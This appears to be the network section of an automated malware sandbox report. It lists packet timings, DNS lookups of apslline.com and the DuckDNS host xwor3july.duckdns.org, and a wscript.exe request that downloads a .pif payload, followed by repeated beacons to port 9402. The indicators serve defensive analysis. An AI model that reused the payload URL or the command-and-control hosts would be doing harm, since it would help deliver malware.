                                                                      Oct 15, 2024 16:37:19.471685886 CEST44349730103.53.40.62192.168.2.4
                                                                      Oct 15, 2024 16:37:19.471879959 CEST49730443192.168.2.4103.53.40.62
                                                                      Oct 15, 2024 16:37:19.481275082 CEST44349730103.53.40.62192.168.2.4
                                                                      Oct 15, 2024 16:37:19.481349945 CEST44349730103.53.40.62192.168.2.4
                                                                      Oct 15, 2024 16:37:19.481390953 CEST49730443192.168.2.4103.53.40.62
                                                                      Oct 15, 2024 16:37:19.481421947 CEST44349730103.53.40.62192.168.2.4
                                                                      Oct 15, 2024 16:37:19.481435061 CEST49730443192.168.2.4103.53.40.62
                                                                      Oct 15, 2024 16:37:19.481458902 CEST49730443192.168.2.4103.53.40.62
                                                                      Oct 15, 2024 16:37:19.481741905 CEST44349730103.53.40.62192.168.2.4
                                                                      Oct 15, 2024 16:37:19.481800079 CEST49730443192.168.2.4103.53.40.62
                                                                      Oct 15, 2024 16:37:19.482712030 CEST44349730103.53.40.62192.168.2.4
                                                                      Oct 15, 2024 16:37:19.482788086 CEST49730443192.168.2.4103.53.40.62
                                                                      Oct 15, 2024 16:37:19.482928038 CEST44349730103.53.40.62192.168.2.4
                                                                      Oct 15, 2024 16:37:19.482981920 CEST49730443192.168.2.4103.53.40.62
                                                                      Oct 15, 2024 16:37:19.483231068 CEST44349730103.53.40.62192.168.2.4
                                                                      Oct 15, 2024 16:37:19.483287096 CEST49730443192.168.2.4103.53.40.62
                                                                      Oct 15, 2024 16:37:19.483660936 CEST44349730103.53.40.62192.168.2.4
                                                                      Oct 15, 2024 16:37:19.483704090 CEST44349730103.53.40.62192.168.2.4
                                                                      Oct 15, 2024 16:37:19.483721972 CEST49730443192.168.2.4103.53.40.62
                                                                      Oct 15, 2024 16:37:19.483731031 CEST44349730103.53.40.62192.168.2.4
                                                                      Oct 15, 2024 16:37:19.483741999 CEST49730443192.168.2.4103.53.40.62
                                                                      Oct 15, 2024 16:37:19.483762980 CEST49730443192.168.2.4103.53.40.62
                                                                      Oct 15, 2024 16:37:19.484107971 CEST44349730103.53.40.62192.168.2.4
                                                                      Oct 15, 2024 16:37:19.484169960 CEST49730443192.168.2.4103.53.40.62
                                                                      Oct 15, 2024 16:37:19.494467020 CEST44349730103.53.40.62192.168.2.4
                                                                      Oct 15, 2024 16:37:19.494657993 CEST49730443192.168.2.4103.53.40.62
                                                                      Oct 15, 2024 16:37:19.496880054 CEST44349730103.53.40.62192.168.2.4
                                                                      Oct 15, 2024 16:37:19.496970892 CEST49730443192.168.2.4103.53.40.62
                                                                      Oct 15, 2024 16:37:19.498320103 CEST44349730103.53.40.62192.168.2.4
                                                                      Oct 15, 2024 16:37:19.498399019 CEST49730443192.168.2.4103.53.40.62
                                                                      Oct 15, 2024 16:37:19.499608994 CEST44349730103.53.40.62192.168.2.4
                                                                      Oct 15, 2024 16:37:19.499689102 CEST49730443192.168.2.4103.53.40.62
                                                                      Oct 15, 2024 16:37:19.501053095 CEST44349730103.53.40.62192.168.2.4
                                                                      Oct 15, 2024 16:37:19.501131058 CEST49730443192.168.2.4103.53.40.62
                                                                      Oct 15, 2024 16:37:19.505518913 CEST44349730103.53.40.62192.168.2.4
                                                                      Oct 15, 2024 16:37:19.505605936 CEST49730443192.168.2.4103.53.40.62
                                                                      Oct 15, 2024 16:37:19.505812883 CEST44349730103.53.40.62192.168.2.4
                                                                      Oct 15, 2024 16:37:19.505867958 CEST49730443192.168.2.4103.53.40.62
                                                                      Oct 15, 2024 16:37:19.506087065 CEST44349730103.53.40.62192.168.2.4
                                                                      Oct 15, 2024 16:37:19.506148100 CEST49730443192.168.2.4103.53.40.62
                                                                      Oct 15, 2024 16:37:19.506591082 CEST44349730103.53.40.62192.168.2.4
                                                                      Oct 15, 2024 16:37:19.506644011 CEST49730443192.168.2.4103.53.40.62
                                                                      Oct 15, 2024 16:37:19.506808996 CEST44349730103.53.40.62192.168.2.4
                                                                      Oct 15, 2024 16:37:19.506859064 CEST49730443192.168.2.4103.53.40.62
                                                                      Oct 15, 2024 16:37:19.507031918 CEST44349730103.53.40.62192.168.2.4
                                                                      Oct 15, 2024 16:37:19.507085085 CEST49730443192.168.2.4103.53.40.62
                                                                      Oct 15, 2024 16:37:19.507409096 CEST44349730103.53.40.62192.168.2.4
                                                                      Oct 15, 2024 16:37:19.507464886 CEST49730443192.168.2.4103.53.40.62
                                                                      Oct 15, 2024 16:37:19.507474899 CEST44349730103.53.40.62192.168.2.4
                                                                      Oct 15, 2024 16:37:19.507524967 CEST49730443192.168.2.4103.53.40.62
                                                                      Oct 15, 2024 16:37:19.507914066 CEST44349730103.53.40.62192.168.2.4
                                                                      Oct 15, 2024 16:37:19.507962942 CEST44349730103.53.40.62192.168.2.4
                                                                      Oct 15, 2024 16:37:19.507963896 CEST49730443192.168.2.4103.53.40.62
                                                                      Oct 15, 2024 16:37:19.507980108 CEST44349730103.53.40.62192.168.2.4
                                                                      Oct 15, 2024 16:37:19.507998943 CEST49730443192.168.2.4103.53.40.62
                                                                      Oct 15, 2024 16:37:19.508018017 CEST49730443192.168.2.4103.53.40.62
                                                                      Oct 15, 2024 16:37:19.508461952 CEST44349730103.53.40.62192.168.2.4
                                                                      Oct 15, 2024 16:37:19.508516073 CEST49730443192.168.2.4103.53.40.62
                                                                      Oct 15, 2024 16:37:19.593518019 CEST44349730103.53.40.62192.168.2.4
                                                                      Oct 15, 2024 16:37:19.593683958 CEST49730443192.168.2.4103.53.40.62
                                                                      Oct 15, 2024 16:37:19.604125977 CEST44349730103.53.40.62192.168.2.4
                                                                      Oct 15, 2024 16:37:19.604228020 CEST49730443192.168.2.4103.53.40.62
                                                                      Oct 15, 2024 16:37:19.604435921 CEST44349730103.53.40.62192.168.2.4
                                                                      Oct 15, 2024 16:37:19.604489088 CEST49730443192.168.2.4103.53.40.62
                                                                      Oct 15, 2024 16:37:19.604818106 CEST44349730103.53.40.62192.168.2.4
                                                                      Oct 15, 2024 16:37:19.604865074 CEST49730443192.168.2.4103.53.40.62
                                                                      Oct 15, 2024 16:37:19.605258942 CEST44349730103.53.40.62192.168.2.4
                                                                      Oct 15, 2024 16:37:19.605308056 CEST49730443192.168.2.4103.53.40.62
                                                                      Oct 15, 2024 16:37:19.605547905 CEST44349730103.53.40.62192.168.2.4
                                                                      Oct 15, 2024 16:37:19.605597973 CEST49730443192.168.2.4103.53.40.62
                                                                      Oct 15, 2024 16:37:19.605778933 CEST44349730103.53.40.62192.168.2.4
                                                                      Oct 15, 2024 16:37:19.605827093 CEST49730443192.168.2.4103.53.40.62
                                                                      Oct 15, 2024 16:37:19.606159925 CEST44349730103.53.40.62192.168.2.4
                                                                      Oct 15, 2024 16:37:19.606208086 CEST49730443192.168.2.4103.53.40.62
                                                                      Oct 15, 2024 16:37:19.606333971 CEST44349730103.53.40.62192.168.2.4
                                                                      Oct 15, 2024 16:37:19.606379986 CEST49730443192.168.2.4103.53.40.62
                                                                      Oct 15, 2024 16:37:19.606837034 CEST44349730103.53.40.62192.168.2.4
                                                                      Oct 15, 2024 16:37:19.606889009 CEST49730443192.168.2.4103.53.40.62
                                                                      Oct 15, 2024 16:37:19.616710901 CEST44349730103.53.40.62192.168.2.4
                                                                      Oct 15, 2024 16:37:19.616785049 CEST49730443192.168.2.4103.53.40.62
                                                                      Oct 15, 2024 16:37:19.617528915 CEST44349730103.53.40.62192.168.2.4
                                                                      Oct 15, 2024 16:37:19.617595911 CEST49730443192.168.2.4103.53.40.62
                                                                      Oct 15, 2024 16:37:19.620342016 CEST44349730103.53.40.62192.168.2.4
                                                                      Oct 15, 2024 16:37:19.620413065 CEST49730443192.168.2.4103.53.40.62
                                                                      Oct 15, 2024 16:37:19.621588945 CEST44349730103.53.40.62192.168.2.4
                                                                      Oct 15, 2024 16:37:19.621648073 CEST49730443192.168.2.4103.53.40.62
                                                                      Oct 15, 2024 16:37:19.621773005 CEST44349730103.53.40.62192.168.2.4
                                                                      Oct 15, 2024 16:37:19.621819973 CEST49730443192.168.2.4103.53.40.62
                                                                      Oct 15, 2024 16:37:19.627594948 CEST44349730103.53.40.62192.168.2.4
                                                                      Oct 15, 2024 16:37:19.627667904 CEST49730443192.168.2.4103.53.40.62
                                                                      Oct 15, 2024 16:37:19.627902031 CEST44349730103.53.40.62192.168.2.4
                                                                      Oct 15, 2024 16:37:19.627950907 CEST49730443192.168.2.4103.53.40.62
                                                                      Oct 15, 2024 16:37:19.628175020 CEST44349730103.53.40.62192.168.2.4
                                                                      Oct 15, 2024 16:37:19.628225088 CEST49730443192.168.2.4103.53.40.62
                                                                      Oct 15, 2024 16:37:19.628401041 CEST44349730103.53.40.62192.168.2.4
                                                                      Oct 15, 2024 16:37:19.628448009 CEST49730443192.168.2.4103.53.40.62
                                                                      Oct 15, 2024 16:37:19.628623962 CEST44349730103.53.40.62192.168.2.4
                                                                      Oct 15, 2024 16:37:19.628671885 CEST49730443192.168.2.4103.53.40.62
                                                                      Oct 15, 2024 16:37:19.628849983 CEST44349730103.53.40.62192.168.2.4
                                                                      Oct 15, 2024 16:37:19.628895998 CEST49730443192.168.2.4103.53.40.62
                                                                      Oct 15, 2024 16:37:19.629055023 CEST44349730103.53.40.62192.168.2.4
                                                                      Oct 15, 2024 16:37:19.629101992 CEST49730443192.168.2.4103.53.40.62
                                                                      Oct 15, 2024 16:37:19.629288912 CEST44349730103.53.40.62192.168.2.4
                                                                      Oct 15, 2024 16:37:19.629337072 CEST49730443192.168.2.4103.53.40.62
                                                                      Oct 15, 2024 16:37:19.629673004 CEST44349730103.53.40.62192.168.2.4
                                                                      Oct 15, 2024 16:37:19.629707098 CEST44349730103.53.40.62192.168.2.4
                                                                      Oct 15, 2024 16:37:19.629720926 CEST49730443192.168.2.4103.53.40.62
                                                                      Oct 15, 2024 16:37:19.629743099 CEST44349730103.53.40.62192.168.2.4
                                                                      Oct 15, 2024 16:37:19.629748106 CEST49730443192.168.2.4103.53.40.62
                                                                      Oct 15, 2024 16:37:19.629771948 CEST49730443192.168.2.4103.53.40.62
                                                                      Oct 15, 2024 16:37:19.630043030 CEST44349730103.53.40.62192.168.2.4
                                                                      Oct 15, 2024 16:37:19.630095005 CEST49730443192.168.2.4103.53.40.62
                                                                      Oct 15, 2024 16:37:19.656790018 CEST44349730103.53.40.62192.168.2.4
                                                                      Oct 15, 2024 16:37:19.656881094 CEST49730443192.168.2.4103.53.40.62
                                                                      Oct 15, 2024 16:37:19.715964079 CEST44349730103.53.40.62192.168.2.4
                                                                      Oct 15, 2024 16:37:19.716120005 CEST49730443192.168.2.4103.53.40.62
                                                                      Oct 15, 2024 16:37:19.727767944 CEST44349730103.53.40.62192.168.2.4
                                                                      Oct 15, 2024 16:37:19.727854967 CEST49730443192.168.2.4103.53.40.62
                                                                      Oct 15, 2024 16:37:19.728063107 CEST44349730103.53.40.62192.168.2.4
                                                                      Oct 15, 2024 16:37:19.728120089 CEST49730443192.168.2.4103.53.40.62
                                                                      Oct 15, 2024 16:37:19.728307962 CEST44349730103.53.40.62192.168.2.4
                                                                      Oct 15, 2024 16:37:19.728358030 CEST49730443192.168.2.4103.53.40.62
                                                                      Oct 15, 2024 16:37:19.728580952 CEST44349730103.53.40.62192.168.2.4
                                                                      Oct 15, 2024 16:37:19.728631973 CEST49730443192.168.2.4103.53.40.62
                                                                      Oct 15, 2024 16:37:19.728856087 CEST44349730103.53.40.62192.168.2.4
                                                                      Oct 15, 2024 16:37:19.728904963 CEST49730443192.168.2.4103.53.40.62
                                                                      Oct 15, 2024 16:37:19.729207039 CEST44349730103.53.40.62192.168.2.4
                                                                      Oct 15, 2024 16:37:19.729259014 CEST49730443192.168.2.4103.53.40.62
                                                                      Oct 15, 2024 16:37:19.729502916 CEST44349730103.53.40.62192.168.2.4
                                                                      Oct 15, 2024 16:37:19.729552984 CEST49730443192.168.2.4103.53.40.62
                                                                      Oct 15, 2024 16:37:19.729706049 CEST44349730103.53.40.62192.168.2.4
                                                                      Oct 15, 2024 16:37:19.729754925 CEST49730443192.168.2.4103.53.40.62
                                                                      Oct 15, 2024 16:37:19.730278969 CEST44349730103.53.40.62192.168.2.4
                                                                      Oct 15, 2024 16:37:19.730331898 CEST49730443192.168.2.4103.53.40.62
                                                                      Oct 15, 2024 16:37:19.738624096 CEST44349730103.53.40.62192.168.2.4
                                                                      Oct 15, 2024 16:37:19.738723993 CEST49730443192.168.2.4103.53.40.62
                                                                      Oct 15, 2024 16:37:19.740317106 CEST44349730103.53.40.62192.168.2.4
                                                                      Oct 15, 2024 16:37:19.740384102 CEST49730443192.168.2.4103.53.40.62
                                                                      Oct 15, 2024 16:37:19.741868019 CEST44349730103.53.40.62192.168.2.4
                                                                      Oct 15, 2024 16:37:19.741933107 CEST49730443192.168.2.4103.53.40.62
                                                                      Oct 15, 2024 16:37:19.742880106 CEST44349730103.53.40.62192.168.2.4
                                                                      Oct 15, 2024 16:37:19.742937088 CEST49730443192.168.2.4103.53.40.62
                                                                      Oct 15, 2024 16:37:19.743912935 CEST44349730103.53.40.62192.168.2.4
                                                                      Oct 15, 2024 16:37:19.743971109 CEST49730443192.168.2.4103.53.40.62
                                                                      Oct 15, 2024 16:37:19.748785973 CEST44349730103.53.40.62192.168.2.4
                                                                      Oct 15, 2024 16:37:19.748872042 CEST49730443192.168.2.4103.53.40.62
                                                                      Oct 15, 2024 16:37:19.749150991 CEST44349730103.53.40.62192.168.2.4
                                                                      Oct 15, 2024 16:37:19.749206066 CEST49730443192.168.2.4103.53.40.62
                                                                      Oct 15, 2024 16:37:19.749450922 CEST44349730103.53.40.62192.168.2.4
                                                                      Oct 15, 2024 16:37:19.749502897 CEST49730443192.168.2.4103.53.40.62
                                                                      Oct 15, 2024 16:37:19.749767065 CEST44349730103.53.40.62192.168.2.4
                                                                      Oct 15, 2024 16:37:19.749819040 CEST49730443192.168.2.4103.53.40.62
                                                                      Oct 15, 2024 16:37:19.750001907 CEST44349730103.53.40.62192.168.2.4
                                                                      Oct 15, 2024 16:37:19.750055075 CEST49730443192.168.2.4103.53.40.62
                                                                      Oct 15, 2024 16:37:19.750224113 CEST44349730103.53.40.62192.168.2.4
                                                                      Oct 15, 2024 16:37:19.750273943 CEST49730443192.168.2.4103.53.40.62
                                                                      Oct 15, 2024 16:37:19.750380993 CEST44349730103.53.40.62192.168.2.4
                                                                      Oct 15, 2024 16:37:19.750427008 CEST49730443192.168.2.4103.53.40.62
                                                                      Oct 15, 2024 16:37:19.750659943 CEST44349730103.53.40.62192.168.2.4
                                                                      Oct 15, 2024 16:37:19.750709057 CEST49730443192.168.2.4103.53.40.62
                                                                      Oct 15, 2024 16:37:19.750839949 CEST44349730103.53.40.62192.168.2.4
                                                                      Oct 15, 2024 16:37:19.750889063 CEST49730443192.168.2.4103.53.40.62
                                                                      Oct 15, 2024 16:37:19.751086950 CEST44349730103.53.40.62192.168.2.4
                                                                      Oct 15, 2024 16:37:19.751138926 CEST49730443192.168.2.4103.53.40.62
                                                                      Oct 15, 2024 16:37:19.751290083 CEST44349730103.53.40.62192.168.2.4
                                                                      Oct 15, 2024 16:37:19.751339912 CEST49730443192.168.2.4103.53.40.62
                                                                      Oct 15, 2024 16:37:19.775640011 CEST44349730103.53.40.62192.168.2.4
                                                                      Oct 15, 2024 16:37:19.775748968 CEST49730443192.168.2.4103.53.40.62
                                                                      Oct 15, 2024 16:37:19.845199108 CEST44349730103.53.40.62192.168.2.4
                                                                      Oct 15, 2024 16:37:19.845339060 CEST49730443192.168.2.4103.53.40.62
                                                                      Oct 15, 2024 16:37:19.845909119 CEST44349730103.53.40.62192.168.2.4
                                                                      Oct 15, 2024 16:37:19.845980883 CEST49730443192.168.2.4103.53.40.62
                                                                      Oct 15, 2024 16:37:19.846298933 CEST44349730103.53.40.62192.168.2.4
                                                                      Oct 15, 2024 16:37:19.846358061 CEST49730443192.168.2.4103.53.40.62
                                                                      Oct 15, 2024 16:37:19.846595049 CEST44349730103.53.40.62192.168.2.4
                                                                      Oct 15, 2024 16:37:19.846657038 CEST49730443192.168.2.4103.53.40.62
                                                                      Oct 15, 2024 16:37:19.846875906 CEST44349730103.53.40.62192.168.2.4
                                                                      Oct 15, 2024 16:37:19.846930027 CEST49730443192.168.2.4103.53.40.62
                                                                      Oct 15, 2024 16:37:19.847279072 CEST44349730103.53.40.62192.168.2.4
                                                                      Oct 15, 2024 16:37:19.847340107 CEST49730443192.168.2.4103.53.40.62
                                                                      Oct 15, 2024 16:37:19.847560883 CEST44349730103.53.40.62192.168.2.4
                                                                      Oct 15, 2024 16:37:19.847613096 CEST49730443192.168.2.4103.53.40.62
                                                                      Oct 15, 2024 16:37:19.847928047 CEST44349730103.53.40.62192.168.2.4
                                                                      Oct 15, 2024 16:37:19.847984076 CEST49730443192.168.2.4103.53.40.62
                                                                      Oct 15, 2024 16:37:19.847992897 CEST44349730103.53.40.62192.168.2.4
                                                                      Oct 15, 2024 16:37:19.848006964 CEST44349730103.53.40.62192.168.2.4
                                                                      Oct 15, 2024 16:37:19.848037958 CEST49730443192.168.2.4103.53.40.62
                                                                      Oct 15, 2024 16:37:19.848053932 CEST49730443192.168.2.4103.53.40.62
                                                                      Oct 15, 2024 16:37:19.848357916 CEST44349730103.53.40.62192.168.2.4
                                                                      Oct 15, 2024 16:37:19.848418951 CEST49730443192.168.2.4103.53.40.62
                                                                      Oct 15, 2024 16:37:19.857057095 CEST44349730103.53.40.62192.168.2.4
                                                                      Oct 15, 2024 16:37:19.857139111 CEST49730443192.168.2.4103.53.40.62
                                                                      Oct 15, 2024 16:37:19.857676983 CEST44349730103.53.40.62192.168.2.4
                                                                      Oct 15, 2024 16:37:19.857734919 CEST49730443192.168.2.4103.53.40.62
                                                                      Oct 15, 2024 16:37:19.860224009 CEST44349730103.53.40.62192.168.2.4
                                                                      Oct 15, 2024 16:37:19.860310078 CEST49730443192.168.2.4103.53.40.62
                                                                      Oct 15, 2024 16:37:19.861692905 CEST44349730103.53.40.62192.168.2.4
                                                                      Oct 15, 2024 16:37:19.861773014 CEST49730443192.168.2.4103.53.40.62
                                                                      Oct 15, 2024 16:37:19.862966061 CEST44349730103.53.40.62192.168.2.4
                                                                      Oct 15, 2024 16:37:19.863039017 CEST49730443192.168.2.4103.53.40.62
                                                                      Oct 15, 2024 16:37:19.868544102 CEST44349730103.53.40.62192.168.2.4
                                                                      Oct 15, 2024 16:37:19.868598938 CEST44349730103.53.40.62192.168.2.4
                                                                      Oct 15, 2024 16:37:19.868638992 CEST49730443192.168.2.4103.53.40.62
                                                                      Oct 15, 2024 16:37:19.868660927 CEST44349730103.53.40.62192.168.2.4
                                                                      Oct 15, 2024 16:37:19.868680954 CEST44349730103.53.40.62192.168.2.4
                                                                      Oct 15, 2024 16:37:19.868700027 CEST49730443192.168.2.4103.53.40.62
                                                                      Oct 15, 2024 16:37:19.868731022 CEST49730443192.168.2.4103.53.40.62
                                                                      Oct 15, 2024 16:37:19.869012117 CEST49730443192.168.2.4103.53.40.62
                                                                      Oct 15, 2024 16:37:19.869025946 CEST44349730103.53.40.62192.168.2.4
                                                                      Oct 15, 2024 16:37:19.869043112 CEST49730443192.168.2.4103.53.40.62
                                                                      Oct 15, 2024 16:37:19.869048119 CEST44349730103.53.40.62192.168.2.4
                                                                      Oct 15, 2024 16:37:53.862355947 CEST49737443192.168.2.4103.53.40.62
                                                                      Oct 15, 2024 16:37:53.862399101 CEST44349737103.53.40.62192.168.2.4
                                                                      Oct 15, 2024 16:37:53.862487078 CEST49737443192.168.2.4103.53.40.62
                                                                      Oct 15, 2024 16:37:53.871717930 CEST49737443192.168.2.4103.53.40.62
                                                                      Oct 15, 2024 16:37:53.871736050 CEST44349737103.53.40.62192.168.2.4
                                                                      Oct 15, 2024 16:37:54.949485064 CEST44349737103.53.40.62192.168.2.4
                                                                      Oct 15, 2024 16:37:54.949562073 CEST49737443192.168.2.4103.53.40.62
                                                                      Oct 15, 2024 16:37:55.041232109 CEST49737443192.168.2.4103.53.40.62
                                                                      Oct 15, 2024 16:37:55.041253090 CEST44349737103.53.40.62192.168.2.4
                                                                      Oct 15, 2024 16:37:55.041887045 CEST44349737103.53.40.62192.168.2.4
                                                                      Oct 15, 2024 16:37:55.041939974 CEST49737443192.168.2.4103.53.40.62
                                                                      Oct 15, 2024 16:37:55.046480894 CEST49737443192.168.2.4103.53.40.62
                                                                      Oct 15, 2024 16:37:55.091401100 CEST44349737103.53.40.62192.168.2.4
                                                                      Oct 15, 2024 16:37:55.411695957 CEST44349737103.53.40.62192.168.2.4
                                                                      Oct 15, 2024 16:37:55.411727905 CEST44349737103.53.40.62192.168.2.4
                                                                      Oct 15, 2024 16:37:55.411833048 CEST49737443192.168.2.4103.53.40.62
                                                                      Oct 15, 2024 16:37:55.411859035 CEST44349737103.53.40.62192.168.2.4
                                                                      Oct 15, 2024 16:37:55.411884069 CEST49737443192.168.2.4103.53.40.62
                                                                      Oct 15, 2024 16:37:55.411915064 CEST49737443192.168.2.4103.53.40.62
                                                                      Oct 15, 2024 16:37:55.546932936 CEST44349737103.53.40.62192.168.2.4
                                                                      Oct 15, 2024 16:37:55.547096968 CEST49737443192.168.2.4103.53.40.62
                                                                      Oct 15, 2024 16:37:55.652399063 CEST44349737103.53.40.62192.168.2.4
                                                                      Oct 15, 2024 16:37:55.652488947 CEST49737443192.168.2.4103.53.40.62
                                                                      Oct 15, 2024 16:37:55.768759012 CEST44349737103.53.40.62192.168.2.4
                                                                      Oct 15, 2024 16:37:55.768821001 CEST44349737103.53.40.62192.168.2.4
                                                                      Oct 15, 2024 16:37:55.768846035 CEST49737443192.168.2.4103.53.40.62
                                                                      Oct 15, 2024 16:37:55.768867016 CEST44349737103.53.40.62192.168.2.4
                                                                      Oct 15, 2024 16:37:55.768881083 CEST49737443192.168.2.4103.53.40.62
                                                                      Oct 15, 2024 16:37:55.768889904 CEST44349737103.53.40.62192.168.2.4
                                                                      Oct 15, 2024 16:37:55.768925905 CEST49737443192.168.2.4103.53.40.62
                                                                      Oct 15, 2024 16:37:55.769140959 CEST49737443192.168.2.4103.53.40.62
                                                                      Oct 15, 2024 16:37:55.769157887 CEST44349737103.53.40.62192.168.2.4
                                                                      Oct 15, 2024 16:38:12.657685041 CEST497559402192.168.2.412.221.146.138
                                                                      Oct 15, 2024 16:38:12.662513018 CEST94024975512.221.146.138192.168.2.4
                                                                      Oct 15, 2024 16:38:12.662656069 CEST497559402192.168.2.412.221.146.138
                                                                      Oct 15, 2024 16:38:12.788990974 CEST497559402192.168.2.412.221.146.138
                                                                      Oct 15, 2024 16:38:12.793843031 CEST94024975512.221.146.138192.168.2.4
                                                                      Oct 15, 2024 16:38:24.736567020 CEST94024975512.221.146.138192.168.2.4
                                                                      Oct 15, 2024 16:38:24.789290905 CEST497559402192.168.2.412.221.146.138
                                                                      Oct 15, 2024 16:38:25.278445959 CEST497559402192.168.2.412.221.146.138
                                                                      Oct 15, 2024 16:38:25.283447981 CEST94024975512.221.146.138192.168.2.4
                                                                      Oct 15, 2024 16:38:25.524374962 CEST94024975512.221.146.138192.168.2.4
                                                                      Oct 15, 2024 16:38:25.570569992 CEST497559402192.168.2.412.221.146.138
                                                                      Oct 15, 2024 16:38:37.743094921 CEST497559402192.168.2.412.221.146.138
                                                                      Oct 15, 2024 16:38:37.750195980 CEST94024975512.221.146.138192.168.2.4
                                                                      Oct 15, 2024 16:38:37.999785900 CEST94024975512.221.146.138192.168.2.4
                                                                      Oct 15, 2024 16:38:38.055039883 CEST497559402192.168.2.412.221.146.138
                                                                      Oct 15, 2024 16:38:50.227200031 CEST497559402192.168.2.412.221.146.138
                                                                      Oct 15, 2024 16:38:50.232080936 CEST94024975512.221.146.138192.168.2.4
                                                                      Oct 15, 2024 16:38:50.489301920 CEST94024975512.221.146.138192.168.2.4
                                                                      Oct 15, 2024 16:38:50.539450884 CEST497559402192.168.2.412.221.146.138
                                                                      Oct 15, 2024 16:38:54.938606024 CEST94024975512.221.146.138192.168.2.4
                                                                      Oct 15, 2024 16:38:54.982382059 CEST94024975512.221.146.138192.168.2.4
                                                                      Oct 15, 2024 16:38:54.982502937 CEST497559402192.168.2.412.221.146.138
                                                                      Oct 15, 2024 16:39:02.696141958 CEST497559402192.168.2.412.221.146.138
                                                                      Oct 15, 2024 16:39:02.701019049 CEST94024975512.221.146.138192.168.2.4
                                                                      Oct 15, 2024 16:39:02.941988945 CEST94024975512.221.146.138192.168.2.4
                                                                      Oct 15, 2024 16:39:02.992533922 CEST497559402192.168.2.412.221.146.138
                                                                      Oct 15, 2024 16:39:06.883620024 CEST497559402192.168.2.412.221.146.138
                                                                      Oct 15, 2024 16:39:07.195736885 CEST497559402192.168.2.412.221.146.138
                                                                      Oct 15, 2024 16:39:07.760099888 CEST94024975512.221.146.138192.168.2.4
                                                                      Oct 15, 2024 16:39:07.760113955 CEST94024975512.221.146.138192.168.2.4
                                                                      Oct 15, 2024 16:39:08.007586002 CEST94024975512.221.146.138192.168.2.4
                                                                      Oct 15, 2024 16:39:08.055042982 CEST497559402192.168.2.412.221.146.138
                                                                      Oct 15, 2024 16:39:12.711608887 CEST497559402192.168.2.412.221.146.138
                                                                      Oct 15, 2024 16:39:12.716583967 CEST94024975512.221.146.138192.168.2.4
                                                                      Oct 15, 2024 16:39:12.958477974 CEST94024975512.221.146.138192.168.2.4
                                                                      Oct 15, 2024 16:39:13.008173943 CEST497559402192.168.2.412.221.146.138
                                                                      Oct 15, 2024 16:39:24.732378006 CEST94024975512.221.146.138192.168.2.4
                                                                      Oct 15, 2024 16:39:24.774015903 CEST497559402192.168.2.412.221.146.138
                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Oct 15, 2024 16:37:14.016165972 CEST6551553192.168.2.41.1.1.1
                                                                      Oct 15, 2024 16:37:14.024137974 CEST53655151.1.1.1192.168.2.4
                                                                      Oct 15, 2024 16:38:03.867955923 CEST5565253192.168.2.41.1.1.1
                                                                      Oct 15, 2024 16:38:04.883558989 CEST5565253192.168.2.41.1.1.1
                                                                      Oct 15, 2024 16:38:05.899617910 CEST5565253192.168.2.41.1.1.1
                                                                      Oct 15, 2024 16:38:07.878895044 CEST53556521.1.1.1192.168.2.4
                                                                      Oct 15, 2024 16:38:07.878911018 CEST53556521.1.1.1192.168.2.4
                                                                      Oct 15, 2024 16:38:07.879162073 CEST53556521.1.1.1192.168.2.4
                                                                      Oct 15, 2024 16:38:12.525002956 CEST5634453192.168.2.41.1.1.1
                                                                      Oct 15, 2024 16:38:12.656877995 CEST53563441.1.1.1192.168.2.4
                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                      Oct 15, 2024 16:37:14.016165972 CEST192.168.2.41.1.1.10x7becStandard query (0)apslline.comA (IP address)IN (0x0001)false
                                                                      Oct 15, 2024 16:38:03.867955923 CEST192.168.2.41.1.1.10xc102Standard query (0)xwor3july.duckdns.orgA (IP address)IN (0x0001)false
                                                                      Oct 15, 2024 16:38:04.883558989 CEST192.168.2.41.1.1.10xc102Standard query (0)xwor3july.duckdns.orgA (IP address)IN (0x0001)false
                                                                      Oct 15, 2024 16:38:05.899617910 CEST192.168.2.41.1.1.10xc102Standard query (0)xwor3july.duckdns.orgA (IP address)IN (0x0001)false
                                                                      Oct 15, 2024 16:38:12.525002956 CEST192.168.2.41.1.1.10x93c7Standard query (0)xwor3july.duckdns.orgA (IP address)IN (0x0001)false
                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                      Oct 15, 2024 16:37:14.024137974 CEST1.1.1.1192.168.2.40x7becNo error (0)apslline.com103.53.40.62A (IP address)IN (0x0001)false
                                                                      Oct 15, 2024 16:38:07.878895044 CEST1.1.1.1192.168.2.40xc102Server failure (2)xwor3july.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                      Oct 15, 2024 16:38:07.878911018 CEST1.1.1.1192.168.2.40xc102Server failure (2)xwor3july.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                      Oct 15, 2024 16:38:07.879162073 CEST1.1.1.1192.168.2.40xc102Server failure (2)xwor3july.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                      Oct 15, 2024 16:38:12.656877995 CEST1.1.1.1192.168.2.40x93c7No error (0)xwor3july.duckdns.org12.221.146.138A (IP address)IN (0x0001)false
                                                                      • apslline.com
                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      0192.168.2.449730103.53.40.624437472C:\Windows\System32\wscript.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-10-15 14:37:15 UTC192OUTGET /Motocrossbanerne37.pif HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Accept: */*
                                                                      Accept-Language: en-CH
                                                                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                      Host: apslline.com
                                                                      2024-10-15 14:37:15 UTC210INHTTP/1.1 200 OK
                                                                      Date: Tue, 15 Oct 2024 14:37:15 GMT
                                                                      Server: Apache
                                                                      Upgrade: h2,h2c
                                                                      Connection: Upgrade, close
                                                                      Last-Modified: Tue, 15 Oct 2024 12:21:14 GMT
                                                                      Accept-Ranges: bytes
                                                                      Content-Length: 5329718
